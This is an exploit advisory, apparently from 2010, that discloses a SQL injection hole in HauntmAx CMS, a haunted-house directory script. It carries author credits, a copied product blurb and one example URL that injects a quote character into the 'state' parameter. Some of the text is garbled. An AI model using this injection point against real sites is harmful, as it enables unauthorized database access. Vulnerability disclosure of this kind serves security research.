HauntmAx CMS Haunted House Directory Listing SQL & amp; n

Test method:

The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! Name: HauntmAx CMS SQLi Vulnerability
Date: June, 9 2010
Vendor url: http://www.hauntmax.com/
Platform: Linux, Windows
Price: $200
Author: Sid3 ^ effects aKa HaRi <shell_c99 [at] yahoo.com>
Special thanks to: r0073r (inj3ct0r.com), L0rd CruSad3r, MaYur, gunslinger _
Greetz to: All ICW members.

######################################## ######################################## ###############################
Description:

HauntmAx CMS Haunted House Directory Listing

* Visit Publisher Site
* Need help with this script?
* Hire a Hot Scripts Consultant

HauntmAx CMS is the first Content Management System of its kind that lets you build your own Haunted House Directory web site without having to write code from scratch. easy menu driven web builder allows you to create a local area, state, country or even global listing with an automatic user input system. haunt owners can update their own listing with authorized account management capabilities. ma Ke Money !!! * Selling Advertising * Selling Prime Haunt Listing Space * Drive Traffic to Your Site Or just provide a needed service to the haunt community near you. hauntmAx CMS can have your Haunted House Directory up and running in no time at all.

######################################## ######################################## ###############################

Xploit: SQLi Vulnerability

Example: http: // [site]/index. php? C_action = listings & state = % 272

######################################## ######################################## ###############################
# 0day no more
# Sid3 ^ effects